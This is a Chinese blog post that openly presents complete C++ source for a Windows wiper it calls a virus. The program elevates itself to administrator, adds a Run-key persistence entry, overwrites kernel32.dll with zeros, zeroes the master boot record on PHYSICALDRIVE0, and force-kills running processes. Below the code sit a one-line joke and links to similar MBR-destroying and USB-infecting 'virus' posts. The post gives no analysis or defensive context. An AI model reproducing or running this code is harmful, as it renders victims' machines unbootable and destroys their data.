用C++写的病毒(删除mbr)

于 2024-08-14 11:31:18 发布
阅读量172 收藏
点赞数 6
文章标签: c++ 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/QWERTY1145141112/article/details/141186526
版权 
#include <iostream>  
#include <cstdlib> 
#include <windows.h>
#include<bits/stdc++.h> 
#include<ctime>
#include <stdio.h>  
#include <string> 
#include <tchar.h>
#include <shellapi.h>
using namespace std;

void SetStartup()
{
	TCHAR path[MAX_PATH];
	GetModuleFileName(NULL, path, MAX_PATH);
	HKEY hKey;
	LONG result = RegOpenKeyEx(HKEY_CURRENT_USER,
	_T("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"),
	0,
	KEY_SET_VALUE,
	&hKey);
	if (result == ERROR_SUCCESS) {
	RegSetValueEx(hKey, _T("MyStartupApp"), 0, REG_SZ,
	(const BYTE*)path, (lstrlen(path) + 1) * sizeof(TCHAR));
	RegCloseKey(hKey);
	} else {
	}
}
bool IsRunningAsAdmin()
{
    BOOL isAdmin = FALSE;
    PSID administratorsGroup = NULL;
    SID_IDENTIFIER_AUTHORITY ntAuthority = SECURITY_NT_AUTHORITY;

    if (AllocateAndInitializeSid(&ntAuthority, 2,
        SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS,
        0, 0, 0, 0, 0, 0,
        &administratorsGroup))
    {
        CheckTokenMembership(NULL, administratorsGroup, &isAdmin);
        FreeSid(administratorsGroup);
    }
    return isAdmin == TRUE;
}

void RestartAsAdmin()
{
    if (IsRunningAsAdmin())
    {
        return; // Already running as admin
    }

    TCHAR szFilePath[MAX_PATH];
    if (GetModuleFileName(NULL, szFilePath, MAX_PATH))
    {
        SHELLEXECUTEINFO sei = { sizeof(sei) };
        sei.lpVerb = TEXT("runas");
        sei.lpFile = szFilePath;
        sei.nShow = SW_SHOWNORMAL;
        if (!ShellExecuteEx(&sei))
        {
            // Handle error
        }
    }
}
VOID
DebugPriv(
	VOID
)
{
	HANDLE Token;
	UCHAR Buf[sizeof(TOKEN_PRIVILEGES) + sizeof(LUID_AND_ATTRIBUTES)];
	PTOKEN_PRIVILEGES Privs;
 
	if (OpenProcessToken(GetCurrentProcess(),
		MAXIMUM_ALLOWED,
		&Token)) {
		Privs = (PTOKEN_PRIVILEGES)Buf;
 
		Privs->PrivilegeCount = 1;
		Privs->Privileges[0].Luid.LowPart = 20L;
		Privs->Privileges[0].Luid.HighPart = 0;
		Privs->Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
 
		AdjustTokenPrivileges(Token,
			FALSE,
			Privs,
			0,
			NULL,
			NULL);
 
		CloseHandle(Token);
	}
}
void kill_mbr()
{
	FILE* disk = fopen("\\\\.\\PHYSICALDRIVE0", "rb+");
	char mbr[512]={ 0 };
	fwrite(mbr, sizeof(mbr), 1, disk);
	fclose(disk);
}
void infect()
{
	FILE* infect_file = fopen("C:\\Windows\\SysWOW64\\kernel32.dll","rb+");
	char write[666] = { 0 };
	fwrite(write, sizeof(write), 1, infect_file);
	fclose(infect_file);
}
int main()
{
	RestartAsAdmin();
	SetStartup();
	infect();
	kill_mbr();
	system("taskkill /f /fi \"pid ne 1\"");
	return 0;
}

不要去整人,现在还在医院里(((

HMCL1145
关注
  • 6
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
C++木马破坏MBR病毒
ZuoJiaWuKong的博客
07-23 8991
一分钟了解如何编一个C++强力的木马病毒,可不要去干坏事哦!
Python.感染USB病毒
ZuoJiaWuKong的博客
08-13 499
话说上回,因为我弄出Win7杀手病毒,把隔壁问题儿童冯梓朗的电脑报废重启没有C++文件后,我是一阵兴奋,但是想到那边其实也有Python,只不过有点老,是3.6版本的,但是也能用,于是我就尝试着去感染一下我自己带的密码破解盘,在里面装了一下奇奇怪怪的文件首先头文件(C++用惯了这么说) 贼无语,代码段里面没有python的代码段没事,我们继续做 这些都是Python窗口模块中的必备模块然后 再然后感染U盘 就这么简单,但是实际运行起来效果没有X3fangMBR破坏性病毒强力(若想知道的可以去
C++ Windows病毒 破坏MBR
m0_64848283的博客
04-27 403
C++病毒 可破坏引导分区 损坏系统 恶搞程序 请勿用于非法用途
C++病毒功能整合(1)
m0_46239139的博客
02-05 1600
因为很多人关注的重点是病毒的功能而不是病毒的原理,所以与其花上大量精力去讲明白病毒原理,倒不如直接把做好的病毒封装起来直接拿去用,这样不仅方便还节省时间但直接做好发出去的病毒比较死板,所以我将病毒的功能拆开来分别封装起来供大家娱乐,不再赘述具体原理但是这些功能中有一些确实能破坏计算机系统,因此在此声明:请勿在实体机上运行这些代码!该程序代码仅限于学习、研究和教育目的。我明确声明,任何使用或传播此程序或代码的行为均与制作者无关,并且对此不承担任何责任。
C++破坏电脑病毒
m0_67885783的博客
08-21 822
C++破坏系统病毒
c++擦除mbr代码
虽千万人,吾往矣
03-01 1796
群里一个大神发出来的 经本人测试有效,明天去整一个安装盘。仅供学习研究使用,贸然测试引起的任何后果与本人无关。 #include #include #include int main() { int res = MessageBox(NULL,TEXT("病毒即将清空系统MBR"),TEXT("yaomianfa的提醒"),MB_YESNO);//老规矩 加保险
mbr利用原理,c++编程分析(简单剖析)重新上图
闲云野鹤的专栏
04-01 1570
http://bbs.kafan.cn/thread-672479-1-1.html   前段时间网上有个感染mbr病毒,听说很厉害,那么什么是mbr呢,这个可能大家已经有所了解了,我在说具体点:(百度的) MBR(Master Boot Record)就是我们经常说的“硬盘主引导记录”,它是由FDISK等磁盘分区命令在硬盘绝对0扇区的一段数据,它由主引导程序、硬盘分 区表及
分享一病毒源代码,破坏MBR,危险!!仅供学习参考,勿运行(vc++2010已编译通过)
热门推荐
杨航的专栏
04-28 1万+
我在编译的时候,杀毒软件提示病毒并将其拦截,所以会导致编译不成功。 1>D:\c++工程\windows\windows\MBR病毒.cpp : fatal error C1083: 无法打开编译器中间文件:“C:\Users\lenovo\AppData\Local\Temp\_CL_953b34fein”: Permission denied 1> 1>生成失败。 杀毒软件提示: 检
拼多多、腾讯 C++开发工程师面试题
weixin_45820912的博客
12-15 457
(一)拼多多实习服务端 1、 一个C++源文件从文本到可执行文件经历的过程 对于C/C++的程序,从源代码到可执行文件,一般经过下面四个步骤: 1).预处理,产生.ii文件 2).编译,产生汇编文件(.s文件) 3).汇编,产生目标文件(.o或.obj文件) 4).链接,产生可执行文件(.out或.exe文件) 2、#include 的顺序以及尖叫括号和双引号的区别 1....
C++采用ring3读取MBR实例
09-04
本实例将详细介绍如何使用C++在ring3层读取MBR。 首先,了解一下ring3的概念。在x86架构的CPU中,保护模式提供了四个特权级别,从0到3,其中ring0拥有最高的权限,可以直接访问硬件,而ring3则是用户空间的权限等级...
C++破坏MBR的代码
09-04
主要介绍了C++破坏MBR的代码,涉及到对硬盘的主引导记录的破坏性操作,具有一定的参考价值,需要的朋友可以参考下
使用c++的android矩阵求逆程序
07-27
使用c++的android矩阵求逆程序,使用c++的android矩阵求逆程序,使用c++的android矩阵求逆程序使用c++的android矩阵求逆程序使用c++的android矩阵求逆程序使用c++的android矩阵求逆程序使用c++的...
linux系统中c++日志文件功能分享
09-04
总结来说,这个C++日志系统在Linux环境下的实现简化了glog的复杂性,保留了基本的日志入功能,并提供了易于使用的接口。开发者可以根据需要选择不同的日志级别和记录方式,同时利用`FileHelper`类进行文件的读...
c++的 log 日志文件
01-16
本文将深入探讨如何使用C++来编一个基础的日志系统,以便将日志信息入文件。 首先,让我们理解日志的基本概念。日志是一个记录程序运行过程中的事件、错误、警告和其他相关信息的文件。这些信息对于理解和解决...
C++笔记5•内存管理•
最新发布
qq_64446190的博客
08-12 902
内存管理
STL中的迭代器失效(vector为例)
2302_80190394的博客
08-08 379
STL中的迭代器失效(vector为例)
c++ error: ‘*’ does not name a type; did you mean ‘**’?
xiaozhi
08-08 488
c++ error: ‘*’ does not name a type; did you mean ‘**’?
C语言一维数组(含数组二分查找)
hdxbufcbjuhg的博客
08-09 1192
在⼀个升序的数组中查找指定的数字n,很容易想到的⽅法就是遍历数组,但是这种⽅法效率⽐较低。比如我们之前的猜数字游戏,会生成一个随机数来让玩家猜,范围是1~100,那玩家会从1开始一个一个猜吗,不会吧,那样就太慢了,我们一般会从整体的一半开始猜,比如猜50,告诉你大了还是小了,这样只需要一步就可以排除庞大数字中的一半,比如假设猜1 ~ 10000,猜5000后就可以知道猜大了还是小了,直接排除了5000个数字,效率很快,这就是⼆分查找,也叫折半查找。
C++保护MBR完整代码 Windows
03-21
C++保护MBR的代码主要涉及底层的磁盘读操作,需要使用Windows API来实现。下面是一个简单的示例代码: ```cpp #include <iostream> #include <Windows.h> int main() { HANDLE hDevice = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); if (hDevice == INVALID_HANDLE_VALUE) { std::cout << "Failed to open the physical drive." << std::endl; return 1; } DWORD bytesReturned; unsigned char mbr[512]; if (!ReadFile(hDevice, mbr, sizeof(mbr), &bytesReturned, NULL)) { std::cout << "Failed to read MBR." << std::endl; CloseHandle(hDevice); return 1; } // 在这里添加对MBR的保护代码,例如修改MBR的内容或者设置保护标志 if (!WriteFile(hDevice, mbr, sizeof(mbr), &bytesReturned, NULL)) { std::cout << "Failed to write MBR." << std::endl; CloseHandle(hDevice); return 1; } CloseHandle(hDevice); std::cout << "MBR protection completed." << std::endl; return 0; } ``` 请注意,这只是一个简单的示例代码,实际的MBR保护可能需要更复杂的逻辑和安全性考虑。在实际应用中,建议仔细研究相关文档和资料,并确保对系统的修改是安全可靠的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值